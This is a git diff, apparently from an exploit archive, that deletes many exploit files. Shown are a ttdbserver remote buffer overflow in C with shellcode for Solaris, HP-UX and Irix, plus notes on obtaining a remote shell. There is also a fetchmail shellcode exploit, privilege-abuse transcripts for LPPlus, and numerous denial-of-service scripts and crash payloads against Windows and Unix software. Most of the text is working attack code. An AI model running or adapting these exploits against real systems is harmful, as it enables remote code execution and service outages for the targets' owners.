system, to get HP-UX exploit compile with - -DHPUX, for Solaris -DSOLARIS, for Irix use -DIRIX - cmd is run through sh -c, and there is no practical limit for command - length, but it has to fit in buffer (1024 bytes in this case), - and ~(strlen + 1) cannot contain '0' - by default ttdbserver runs from inetd, so it will be respawned each time - it die (I mean execute command), also because it dies correct reply is - clnt_call error (connection reset, timeout etc) - -f file option: On HP-UX and Irix, connected socket gets first free - descriptor, 3 on HP-UX and 5 on Irix. You can use -f option to store - datagram to file, and send it to ttdbserver with your telnet of - choice. With command like "0<&3 1>&3 2>&3 exec sh" on HP-UX you'll get - remote shell running. Solaris dup() connected fd to first free one - over 256, so you have to study sh man page to find a way to do this - You should kill ttdbserver before, to make sure it doesn't have - any files open except 0-2 fds passed from inetd. Actually on Irix - it looks like fucked up, ttdbserver gets 0-2 fds from inetd, ignores - them and opens new ones as 3 and 4 fd, so you need to redirect 5th fd. - It happens on 6.3 at least, I need to look at other versions. - Irix is also the only one I saw which supports ttdbserver over UDP, - keep in mind that by default generated RPC datagram is TCP version with - record marking, you should use -u option to get UDP version (or just remove - first four bytes from generated file) - for reasons I can't quite understand, you _have_ to kil ttdbserver on Solaris - before sending a command there. When ttdbserver has connected clients, - it simply returns an error (filename too long). In both cases - it looks like the program goes through the same way, well, maybe I'll - get a clue one day what happens there. - On Irix to get over its fucked up cache, I simply send like 20kb to make - it flushed, so it's not reliable. You can find a buffer allocated by xdr - and it should be better. - surprizingly there are some differences between ttdbserver on above platforms, - like solaris dup() of fds, start-up Irix behaviour, the fact that - on Irix it first tries chdir to directory then do some task (it's the - reason I have to add "/f" at the end of buffer to have it copy overflow - part of the buffer on stack) etc. That's why it may not work on other - systems and versions than mentioned at the beginning. - - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define PORT 0 -#define BSIZE 1024 - -#if defined(SOLARIS) -# define SP 0xefffd618 -# define LENOFS 80 -char asmcode[]="\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x92\x03\xe0\x48\x90\x02\x60\x10\xe0\x02\x3f\xf0\xa2\x80\x3f\xff\xa0\x24\x40\x10\xd0\x22\x3f\xf0\xc0\x22\x3f\xfc\xa2\x02\x20\x09\xc0\x2c\x7f\xff\xe2\x22\x3f\xf4\xa2\x04\x60\x03\xc0\x2c\x7f\xff\xe2\x22\x3f\xf8\xa2\x04\x40\x10\xc0\x2c\x7f\xff\x82\x10\x20\x0b\x91\xd0\x20\x08\xff\xff\xff\xfc\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x2e\x2d\x63\x2e"; -char NOP[]="\x80\x1c\x40\x11"; -#endif - -#if defined(HPUX) -# define SP 0x7b03cc10 -# define LENOFS 84 -char asmcode[]="\xeb\x40\x40\x02\x0b\x39\x02\x80\xd7\x40\x0c\x1e\xb7\x5a\x20\xb8\x0b\x5a\x02\x59\x0f\x21\x10\x98\x97\x18\x07\xff\x0f\x39\x12\x81\x0f\x20\x12\x99\xb7\x39\x20\x10\x0f\x20\x12\x1f\x0f\x59\x12\x89\xb7\x39\x20\x06\x0f\x20\x12\x1f\x0f\x59\x12\x91\x0b\x38\x06\x19\x0f\x20\x12\x1f\xb7\x59\x07\xe1\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x10\x16\x11\x11\x11\x11\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e"; -char NOP[]="\x0b\x39\x02\x80"; -#endif - -#if defined(IRIX) -# define SP 0x7fff1b30 -# define LENOFS 76 -char asmcode[]="\x04\x10\xff\xff\x27\xe4\x01\x01\x24\x84\xff\x5e\x8c\x8c\xff\xe5\x24\x0d\xff\xff\x01\xac\x60\x23\x01\x84\x60\x20\xa1\x80\xff\xff\xa0\x80\xff\xff\xac\x84\xff\xed\x24\x84\xff\xfd\xa0\x80\xff\xff\xac\x84\xff\xec\x24\x84\xff\xf8\x24\x85\xff\xf0\xac\x84\xff\xf0\xac\x80\xff\xfc\x24\x02\x03\xf3\x02\x04\x8d\x0c\xff\xff\xff\xfc\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e"; -char NOP[]="\x24\x0f\x12\x34"; - -#endif - -#define TT_DBSERVER_PROG 100083 -#define TT_DBSERVER_VERS 1 -#define _TT_P 7 - -struct tt_reply { - int i1; - int i2; -}; - -void usage(char *s) { - printf("Usage: %s [-ku] [-p port] [-f outfile] host cmd\n", s); - exit(0); -} - -bool_t xdr_tt_reply(XDR *xdrs, struct tt_reply *objp) { - - if (!xdr_int(xdrs, &objp->i1)) - return (FALSE); - if (!xdr_int(xdrs, &objp->i2)) - return (FALSE); - return (TRUE); -} - -void make_file(char *fname, char *buf, int type); - -main(int argc, char *argv[]) { - extern int optind; - extern char *optarg; - CLIENT *cl; - enum clnt_stat stat; - struct timeval tm; - struct hostent *hp; - struct sockaddr_in target; - struct tt_reply op_res; - char buf[64000], *path, *cmd, *host, *bp, *outfile = NULL; - int sd, i, sp = SP, bsize = BSIZE, port = PORT, kill = 0, proto = 0; - - while ((i = getopt(argc, argv, "ukp:f:")) != EOF) - switch (i) { - case 'p': - port = atoi(optarg); - break; - case 'k': - kill = 1; - break; - case 'u': - proto = 1; - break; - case 'f': - outfile = optarg; - break; - default: - usage(argv[0]); - } - if (argc - optind < 2) - usage(argv[0]); - cmd = argv[optind + 1]; - host = argv[optind]; - - for (i = 0; i < sizeof(buf); i++) - *(buf + i) = NOP[i % 4]; - - i = bsize - strlen(asmcode) - strlen(cmd); - i &= 0xfffffffc; - strcpy(buf + i, asmcode); - strcat(buf, cmd); - *(int *)(buf + i + LENOFS) = ~(strlen(cmd) + 1); - buf[strlen(buf)] = '.'; - bp = buf + bsize; - for (i = 0; i < 16; bp+=4, i++) - *(int *)bp = sp; -#ifdef IRIX - sp = sp + 400 + 31652; - for (i = 0; i < 5000; bp+=4, i++) - *(int *)bp = sp; - *bp++ = '/'; - *bp++ = 'f'; - path = buf + 2; -#else - path = buf; -#endif - *bp = 0; - - if (outfile) { - make_file(outfile, buf, proto); - printf("rpc datagram stored in %s\n", outfile); - exit(0); - } - - if ((target.sin_addr.s_addr = inet_addr(host)) == -1) { - if ((hp = gethostbyname(host)) == NULL) { - printf("%s: cannot resolve\n", host); - exit(1); - } else - target.sin_addr.s_addr = *(u_long *)hp->h_addr; - } - target.sin_family = AF_INET; - target.sin_port = htons(port); - sd = RPC_ANYSOCK; - - tm.tv_sec = 4; - tm.tv_usec = 0; - if (proto) - cl = clntudp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, tm, &sd); - else - cl = clnttcp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, &sd, 0, 0); - if (cl == NULL) { - clnt_pcreateerror("clnt_create"); - exit(0); - } - cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL); - tm.tv_sec = 10; - - if (kill) { - path = NULL; - bp = NULL; - if ((stat = clnt_call(cl, 15, xdr_wrapstring, (char *)&path, - xdr_wrapstring, (char *)&bp, tm)) != RPC_SUCCESS) { - clnt_perror(cl, "clnt_call"); - exit(1); - } - printf("Could not kill ttdbserver, reply is: %s\n", bp); - exit(1); - } - - if ((stat = clnt_call(cl, _TT_P, xdr_wrapstring, (char *)&path, xdr_tt_reply, - (char *)&op_res, tm)) != RPC_SUCCESS) { - clnt_perror(cl, "clnt_call"); - exit(1); - } - printf("res i1 %d, res i2 %d\n", op_res.i1, op_res.i2); - clnt_destroy(cl); -} - -void make_file(char *fname, char *buf, int type) { - int fd, offs; - XDR xdrm; - struct rpc_msg rpc_hdr; - struct authunix_parms aup; - char dgram[64000], rauth[MAX_AUTH_BYTES]; - - if (type == 1) /* UDP */ - offs = 4; - if ((fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0666)) == -1) { - perror(fname); - exit(1); - } - xdrmem_create(&xdrm, rauth, sizeof(rauth), XDR_ENCODE); - aup.aup_time = (u_long)time(NULL); - aup.aup_machname = "localhost"; - aup.aup_uid = 0; - aup.aup_gid = 0; - aup.aup_len = 0; - aup.aup_gids = NULL; - if (xdr_authunix_parms(&xdrm, &aup) == FALSE) { - printf("error encoding auth cred\n"); - exit(1); - } - rpc_hdr.rm_call.cb_cred.oa_length = xdr_getpos(&xdrm); - xdr_destroy(&xdrm); - xdrmem_create(&xdrm, dgram + 4, sizeof(dgram), XDR_ENCODE); - rpc_hdr.rm_xid = 0x12345678; - rpc_hdr.rm_direction = CALL; - rpc_hdr.rm_call.cb_rpcvers = 2; - rpc_hdr.rm_call.cb_prog = TT_DBSERVER_PROG; - rpc_hdr.rm_call.cb_vers = TT_DBSERVER_VERS; - rpc_hdr.rm_call.cb_proc = _TT_P; - rpc_hdr.rm_call.cb_cred.oa_flavor = AUTH_UNIX; - rpc_hdr.rm_call.cb_cred.oa_base = rauth; - rpc_hdr.rm_call.cb_verf.oa_flavor = AUTH_NONE; - rpc_hdr.rm_call.cb_verf.oa_base = NULL; - rpc_hdr.rm_call.cb_verf.oa_length = 0; - if (xdr_callmsg(&xdrm, &rpc_hdr) == FALSE) { - printf("error encoding rpc header\n"); - exit(1); - } - if (xdr_wrapstring(&xdrm, &buf) == FALSE) { - printf("error encoding rpc data\n"); - exit(1); - } - /* record marking */ - *(u_int *)dgram = 0x80000000 | xdr_getpos(&xdrm); - if (write(fd, dgram + offs, xdr_getpos(&xdrm) + 4) == -1) { - perror("write"); - exit(1); - } - xdr_destroy(&xdrm); - close(fd); -} - diff --git a/platforms/solaris/remote/19681.txt b/platforms/solaris/remote/19681.txt deleted file mode 100755 index 99114ee5b..000000000 --- a/platforms/solaris/remote/19681.txt +++ /dev/null @@ -1,10 +0,0 @@ -source: http://www.securityfocus.com/bid/878/info - -DMI is the Desktop Management Interface, and is a suite of application management programs shipped with Sun's Solaris. Each application that is managed through DMI has a MIF record (which contains information about its managable components and properties) that can be inserted into the MIF database (/var/dmi/db) through the dmisp (DMI Service Providor) daemon. There is no authentication performed on who submits new MIFs, meaning anybody can do it. This creates two possible denial of service conditions. The first is consumption of disk space in /var. There are no limits (set by default) on how much space the DMI database can use. This may be used in conjunction with other vulnerabilities to prevent logging, etc. A second vulnerability is a buffer overflow condition in dmispd when MIFs are a certain size. It may be exploitable beyond being a simple denial of service (it may be possible to execute arbitrary code as root remotely). - -Buffer Overflow Crash: - -echo `perl -e "print 'A' x 1000"` > /usr/home/btellier/my.mif -dmi_cmd -CI ../../../usr/home/btellier/my.mif - -(dmispd segfaults) \ No newline at end of file diff --git a/platforms/unix/local/20192.txt b/platforms/unix/local/20192.txt deleted file mode 100755 index fc30aef3e..000000000 --- a/platforms/unix/local/20192.txt +++ /dev/null @@ -1,53 +0,0 @@ -source: http://www.securityfocus.com/bid/1643/info - -Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include: - -$LPHOME/bin/dccsched -$LPHOME/bin/dcclpdser -$LPHOME/bin/dccbkst - -These start the scheduler, LPD server and network status daemons. - -$LPHOME/bin/dccshut -$LPHOME/bin/dcclpdshut -$LPHOME/bin/dccbkstshut - -These stop the same services. - -By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group. - -Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process. - -Vulnerability #1: - -$ id -uid=600(test) gid=300(users) -$ ps -ef|grep dcc -test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc -root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched -root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser -root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst -$ dccbkstshut -$ dcclpdshut -LPD048E Signal sent to dcclpdser to shut down. -$ dccshut -LPP054I LP Plus scheduler ordered to shutdown. -$ ps -ef|grep dcc -test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc -$ - -Vulnerability #2 - -$ id -uid=600(test) gid=300(users) -$ ps -ef|grep inet -test 26285 26279 0 17:42:42 pts/0 0:00 grep inet -root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s -$ cat > $LPHOME/system/lpdprocess -12276 -^D -$ dcclpdshut -LPD048E Signal sent to dcclpdser to shut down. -$ ps -ef|grep inet -test 26291 26279 0 17:45:17 pts/0 0:00 grep inet -$ \ No newline at end of file diff --git a/platforms/unix/remote/21064.c b/platforms/unix/remote/21064.c deleted file mode 100755 index c62fdef48..000000000 --- a/platforms/unix/remote/21064.c +++ /dev/null @@ -1,63 +0,0 @@ -source: http://www.securityfocus.com/bid/3164/info - -Fetchmail is a unix utility for downloading email from mail servers via POP3. - -Fetchmail contains a vulnerability that may allow for remote attackers to gain access to client systems. The vulnerability has to do with the use of a remotely supplied signed integer value as the index to an array when writing data to memory. - -It is be possible for attackers to overwrite critical variables in memory with arbitrary values if the target client's POP3 server can be impersonated. Successful exploitation can lead to the exectution of arbitrary code on the client host. - -/* fetchmail proof of concepts i386 exploit - * Copyright (C) 2001 Salvatore Sanfilippo - * Code under the GPL license. - * - * Usage: ./a.out | nc -l -p 3333 - * fetchmail localhost -P 3333 -p POP3 - * - * This is a bad exploit with offset carefully selected - * to work in my own system. It will probably not work in - * your system if you don't modify RETR_OFFSET and SHELL_PTR, - * but you may try to set the SHELL_PTR to 0xAAAAAAAA - * and use gdb to obtain the proof that your fetchmail is vulnerable - * without to exploit it. - * Or just read the code in pop3.c. - * - * To improve the exploit portability you may put the shellcode inside - * one of the static char buffers, grep 'static char' *.c. - * - * Tested on fetchmail 5.8.15 running on Linux 2.4.6 - * - * On success you should see the ls output. - */ - -#include - -#define MESSAGES 10 -#define RETR_OFFSET -20 -#define SHELL_PTR 0xbfffba94 - -int main(void) -{ - int ish = SHELL_PTR; - int ret_offset = -10; - char shellcode[] = /* take the shellcode multiple of 4 in size */ - "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" - "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" - "\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0"; - int *sc = (int*) shellcode; - int noop = 0x90909090; - int i; - - /* +OK for user and password, than report the number of messages */ - printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES); - /* Overwrite the RET pointer */ - for (i = ret_offset-20; i < ret_offset+20; i++) - printf("%d %d\r\n", i, ish); - /* Put some NOP */ - for (i = 1; i < 21; i++) - printf("%d %d\r\n", i, noop); - /* Put the shell code in the buffer */ - for (i = 21; i < 21+(sizeof(shellcode)/4); i++) - printf("%d %d\r\n", i, *sc++); - printf(".\r\n"); /* POP data term */ - return 0; -} diff --git a/platforms/unix/remote/21261.txt b/platforms/unix/remote/21261.txt deleted file mode 100755 index 70e7d4576..000000000 --- a/platforms/unix/remote/21261.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/4011/info - -It has been reported that Tru64 systems may be prone to a denial of service condition when handling malformed TCP packets. - -Specifically, when processing a malformed TCP packet with both the SYN and FIN flags set, vulnerable Tru64 systems may block indefinitely, thus causing a denial of service. As a result other legitimate users may no longer be capable of accessing remote services. - -This vulnerability is said to affect Tru64 4.0E as well as various versions of Digital Unix and VxWorks. - -hping2 -a -SPF -p 21 -c 1 \ No newline at end of file diff --git a/platforms/windows/dos/13817.pl b/platforms/windows/dos/13817.pl deleted file mode 100755 index f848baccf..000000000 --- a/platforms/windows/dos/13817.pl +++ /dev/null @@ -1,73 +0,0 @@ -#!/usr/bin/perl -# -# Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability -# -# Vendor: Adobe Systems Inc. -# -# Product Web Page: http://www.adobe.com -# -# Version tested: CS3 10.0 -# -# Summary: Adobe® InDesign® CS3 software provides precise control over -# typography and built-in creative tools for designing, preflighting, -# and publishing documents for print, online, or to mobile devices. Include -# interactivity, animation, video, and sound in page layouts to fully engage -# readers. -# -# Desc: When parsing .indd files to the application, it crashes instantly -# overwriting memory registers. Depending on the offset, EBP, EDI, EDX and -# ESI gets overwritten. Pottential vulnerability use is arbitrary code execution -# and denial of service. -# -# -# Tested on Microsoft Windows XP Professional SP3 (English) -# -# -# -# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic -# -# liquidworm gmail com -# -# Zero Science Lab - http://www.zeroscience.mk -# -# 16.09.2009 -# -# -# -# Vendor status: -# -# [16.09.2009] Vulnerability discovered. -# [09.03.2010] Vulnerability reported to vendor with sent PoC files. -# [21.03.2010] Asked confirmation from the vendor. -# [21.03.2010] Vendor asked for PoC files due to communication errors. -# [22.03.2010] Re-sent PoC files to vendor. -# [04.04.2010] Vendor confirms vulnerability. -# [03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out. -# [04.06.2010] Public advisory released. -# -# -# Zero Science Lab Advisory ID: ZSL-2010-4941 -# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4941.php -# -# -# -# Raw PoC code: -# - -$header = "\x06\x06\xED\xF5\xD8\x1D\x46\xE5\xBD\x31\xEF\xE7\xFE\x74\xB7\x1D\x44\x4F\x43\x55\x4D\x45\x4E\x54\x01"; - -$fn = "teppei.indd"; - -$bof = "\x41" x 10000; - -print "\n\n[*] Creating PoC file: $fn ...\r\n"; - -sleep(1); - -open(indd, ">./$fn") || die "\n\aCannot open $fn : $!"; - -print indd "$header" . "$bof"; - -close (indd); - -print "\n[*] PoC file successfully created!\r\n"; \ No newline at end of file diff --git a/platforms/windows/dos/22817.pl b/platforms/windows/dos/22817.pl deleted file mode 100755 index 694f49cc9..000000000 --- a/platforms/windows/dos/22817.pl +++ /dev/null @@ -1,33 +0,0 @@ -source: http://www.securityfocus.com/bid/8010/info - -MyServer HTTP server has been reported prone to a remote denial of service attack. - -The issue presents itself, likely due to a lack of sufficient bounds checking, performed on arguments that are supplied via malicious HTTP GET requests. It has been reported that a remote attacker may invoke a malicious HTTP GET request containing excessive data, that will supposedly trigger a segmentation fault in the server executable and the software will fail. - -#!/usr/bin/perl - -#Myserver 0.4.1 Remote Denial of service ;) -#oh joy... -#deadbeat, uk2sec -#eip@oakey.no-ip.com -#deadbeat@sdf.lonestar.org - -use IO::Socket; -$dos = "//"x100; -$request = "GET $dos"."HTTP/1.0\r\n\r\n"; - -$target = $ARGV[0]; - -print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n"; -print "deadbeat, uk2sec..\n"; -print "usage: perl $0 \n"; -$sox = IO::Socket::INET->new( - Proto=>"tcp", - PeerPort=>"80", - PeerAddr=>"$target" -)or die "\nCan't connect to $target..\n"; -print $sox $request; -sleep 2; -close $sox; -print "Done...\n"; - diff --git a/platforms/windows/dos/24738.c b/platforms/windows/dos/24738.c deleted file mode 100755 index 25c4dc1e1..000000000 --- a/platforms/windows/dos/24738.c +++ /dev/null @@ -1,88 +0,0 @@ -source: http://www.securityfocus.com/bid/11677/info - -NetNote server is reported prone to a remote denial of service vulnerability. This issue occurs because the application does not handle exceptional conditions properly. - -NetNote server 2.2 build 230 is reported vulnerable to this issue, however, it is likely that other versions are affected as well. - -*/ -� -#include "winsock2.h" -#include "fstream.h" -� -#pragma comment(lib, "ws2_32") -� - -static char payload[100]; -� -char crash[]="\x90\x90\x90\x90\x20\x20\x20\x20"; -� -void usage(char* us); -WSADATA wsadata; -void ver(); -� -int main(int argc,char *argv[]) -{ -�ver(); -�if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;} -�if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "< + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/5817.pl b/platforms/windows/dos/5817.pl deleted file mode 100755 index ba6396107..000000000 --- a/platforms/windows/dos/5817.pl +++ /dev/null @@ -1,38 +0,0 @@ -- Dana IRC <= 1.3 Remote Buffer Overflow POC/Crash - - - Discovered On: 14 JUNE 2008 - Discovered By: t0pP8uZz - - Download: diebestenbits.de - - - - Info - - - Dana Irc client suffers from a remote buffer overflow, sending a buffer of around 2k - overwrites the EIP therefor crashes the client. The reason why there isnt any shellcode here - is because the client is coverting the junk/buffer data to unicode so its corrupting the shellcode - ive tried sending unicode buffer but the same problem occurs. - - if anyone else can get further please let me know. but i doubt you can. - - there are also other registers you can overwrite using diffrent junk data to overflow them. - - the peice of perl code below will listen on port 6667 and when a Dana IRC client connects - it will crash the client. its also possible to send the data direct to the user. - - peace, t0pP8uZz - -#!/usr/bin/perl - -use IO::Socket; - -$sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '6667', Listen => SOMAXCONN, Reuse => 1 ); - -$jnk = "%n"x1000; -print "Running.."; -while($client = $sock->accept()) { - print $client "$jnk\r\n"; - print "Crashed Client!\n"; -} - -# milw0rm.com [2008-06-14] diff --git a/platforms/windows/local/19974.c b/platforms/windows/local/19974.c deleted file mode 100755 index ca0b2c0a2..000000000 --- a/platforms/windows/local/19974.c +++ /dev/null @@ -1,76 +0,0 @@ -source: http://www.securityfocus.com/bid/1282/info - -Windows Media Encoder is part of Windows Media Services. It's purpose is to convert content into a suitable format for video or audio streaming through the Media Services. - -If a specially malformed request is sent to the Windows Media Encoder it could cause the service to crash. The service would need to be restarted in order to regain normal functionality. - -/* - * - * Media Streaming Broadcast Distribution (MSBD) - * Denial of Service Attack - * - * (C) 2000 Kit Knox - Public Release: 05/31/00 - * - * Causes the Windows Media Encoder to crash with a "Runtime Error!" - * - * "NSREX caused an invalid page fault in module MFC42.DLL at 0177:5f4012a1". - * - * Tested on version 4.1.0.3920 file "NsRex.exe" 998KB 1/11/00. - * - * Official Microsoft patch is available : - * - * http://www.microsoft.com/technet/security/bulletin/ms00-038.asp - * - * Thanks to Microsoft and the WMT group for their prompt attention to this - * matter. - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include - -char bogus_msbd_packet1[] = { -0x4d, 0x53, 0x42, 0x20, 0x06, 0x01, 0x07, 0x00, 0x24, 0x00, 0x00, 0x40, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x4e, 0x00, -0x65, 0x00, 0x74, 0x00, 0x00, 0x50, 0x53, 0x00, 0x68, 0x00, 0x6f, 0x00, -0x77, 0x00, 0x00, 0x00 -}; - -int sock; - -int main(int argc, char *argv[]) { - struct hostent *he; - struct sockaddr_in sa; - char buf[1024]; - - if (argc != 2) { - fprintf(stderr, "usage: %s \n", argv[0]); - return(-1); - } - - sock = socket ( AF_INET, SOCK_STREAM, 0); - sa.sin_family = AF_INET; - sa.sin_port = htons(7007); - he = gethostbyname (argv[1]); - if (!he) { - if ((sa.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE) - return(-1); - } else { - bcopy(he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length); - } - if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) { - fprintf(stderr, "Fatal Error: Can't connect to Windows Media Encoder.\n"); - return(-1); - } - write(sock, bogus_msbd_packet1, sizeof(bogus_msbd_packet1)); - for (;;) { - read(sock, buf, sizeof(buf)); - } -} - diff --git a/platforms/windows/local/20432.txt b/platforms/windows/local/20432.txt deleted file mode 100755 index 0e0277109..000000000 --- a/platforms/windows/local/20432.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/1999/info - -Network Associates WebShield SMTP is an email virus scanner designed for internet gateways. - -In the event that WebShield SMTP receives an outgoing email containing six "%20" followed by any character within the recipient field, the application will crash, resulting in an access violation error upon processing of the email. Restarting WebShield SMTP is required in order to regain normal functionality. It has been unverified as to whether or not arbitrary code can be executed on the target system if specially crafted code is inserted into the buffer. - -recipient@f%20f%20f%20f%20f%20f%20f \ No newline at end of file diff --git a/platforms/windows/local/20589.c b/platforms/windows/local/20589.c deleted file mode 100755 index e27d8be7d..000000000 --- a/platforms/windows/local/20589.c +++ /dev/null @@ -1,123 +0,0 @@ -source: http://www.securityfocus.com/bid/2278/info - -A maliciously-formed packet sent to Iris by a remote attacker, upon opening in the program for analysis by a user, will cause Iris to terminate. - -The crash is caused by an inability of Iris to handle packets with malformed values in its headers. - -/* Denial of Service attack against : - * Iris The Network Traffic Analyzer beta 1.01 - * ------------------------------------------------ - * - * Will create an incorrect packet which will cause - * Iris to hang when it is opened by a user. - * - * Vulnerability found by : grazer@digit-labs.org - * Exploit code by : grazer@digit-labs.org - * - * Respect to the guys from eEye, for there fast - * response. - * - * greetings to hit2000, hwa, synnergy, security.is - * digit-labs. - * - * ---------------> free sk8!!!! <----------------- - * - * ------------------------------------------------ - * http://www.digit-labs.org - * grazer@digit-labs.org - * ------------------------------------------------ - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int build_packet(int sfd, u_long srcaddr, u_long dstaddr); - -struct pseudo { -u_long saddr; -u_long daddr; -u_char zero; -u_char protocol; -u_short length; -}; - -int main(int argc,char **argv){ -int rawfd, check, one=1; - -struct sockaddr_in raddr; -struct in_addr source_ip, desti_ip; -struct ip *ip; -struct tcphdr *tcp; - - while (argc<3) { - fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]"); - fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0] ); exit(0);} - - fprintf(stderr, "\nStarting Iris DoS...\n"); - if((check=gethostbyname(argv[2])==NULL)) { - fprintf(stderr, "\nCannot resolve host %s\n", argv[2]); exit(0); } - - source_ip.s_addr= inet_addr(argv[1]); - desti_ip.s_addr = inet_addr(argv[2]); - - if ((rawfd=socket(PF_INET, SOCK_RAW, IPPROTO_TCP))<0) { - fprintf(stderr, "\n You need root for this.."); - exit(0); } - - setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, 1); - - build_packet(rawfd,source_ip.s_addr, desti_ip.s_addr); - - close(rawfd); -return 1; } - - -int build_packet(int sfd, u_long srcaddr, u_long dstaddr) { - -u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)]; -struct sockaddr_in sin; -struct in_addr src_inaddr, dest_inaddr; -struct ip *ip = (struct ip *) packet; -struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip)); -struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip) -+ sizeof(struct pseudo)); - - bzero(packet, sizeof(packet)); - bzero(&sin,sizeof(sin)); - - src_inaddr.s_addr = srcaddr; - dest_inaddr.s_addr = dstaddr; - - pseudo->saddr = srcaddr; - pseudo->daddr = dstaddr; - pseudo->zero = 1; - pseudo->protocol=IPPROTO_TCP; - pseudo->length = htons(sizeof (struct tcphdr)); - - ip->ip_v = -1; - ip->ip_hl = -1; - ip->ip_id = -1; - ip->ip_src = src_inaddr; - ip->ip_dst = dest_inaddr; - ip->ip_p = IPPROTO_TCP; - ip->ip_ttl = 40; - ip->ip_off = -1; - ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); - tcp->seq = htonl(rand()); - tcp->ack = htonl(rand()); - - sin.sin_family=AF_INET; - sin.sin_addr.s_addr=dstaddr; - sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0, - (struct sockaddr *) &sin,sizeof(sin)); - - fprintf(stderr, "\n Packet send... \n\n" ); - - return 1;} diff --git a/platforms/windows/local/24411.c b/platforms/windows/local/24411.c deleted file mode 100755 index d2857a57b..000000000 --- a/platforms/windows/local/24411.c +++ /dev/null @@ -1,40 +0,0 @@ -source: http://www.securityfocus.com/bid/11042/info - -Regmon is reported prone to a local denial of service vulnerability. This issue presents itself because the application fails to handle exceptional conditions and references unvalidated pointers to kernel functions. - -Successful exploitation may allow a local unauthorized attacker to cause a denial of service condition in the application. The attacker may then obfuscate changes to the registry from the administrator and carry out further attacks against a vulnerable computer. - -Regmon 6.11 for NT/9x and prior versions are reportedly affected by this issue. - -/* - * ntregmon-dos.c (up to 6.11) - * - * Copyright (c) 2002-2004 By Next Generation Security S.L. - * All rights reserved - * http://www.ngsec.com - * - * Compiles with: cl ntregmon-dos.c - * - * Madrid, August 2004 - */ - -#include - -#define MY_NULL 0x01 -typedef DWORD (* zwsetvaluekey_TYPE)(DWORD KeyHandle, DWORD ValueName, DWORD TitleIndex, DWORD Type, DWORD Data, DWORD DataSize); - - -int main(int argc, char *argv[]) { -HINSTANCE dll; -zwsetvaluekey_TYPE my_ZwSetValueKey; - - if ((dll=LoadLibrary("ntdll.dll"))!=NULL) { - - if ((my_ZwSetValueKey=(zwsetvaluekey_TYPE)GetProcAddress(dll,"ZwSetValueKey"))!=NULL) { - - my_ZwSetValueKey(MY_NULL,MY_NULL,MY_NULL,MY_NULL,MY_NULL,MY_NULL); - - } - } - -} diff --git a/platforms/windows/local/25268.txt b/platforms/windows/local/25268.txt deleted file mode 100755 index ce7b04ef3..000000000 --- a/platforms/windows/local/25268.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/12889/info - -Microsoft Windows XP is prone to a remote denial of service vulnerability. This issue can allow a remote unauthorized user to shutdown an affected computer. - -A remote attacker uses the TSShutdn.exe command to restart or shutdown a computer. - -It should be noted that the exploitation of this vulnerability may require the attacker to be part of the same domain. This BID will be updated when more information is available. - -Microsoft Windows XP 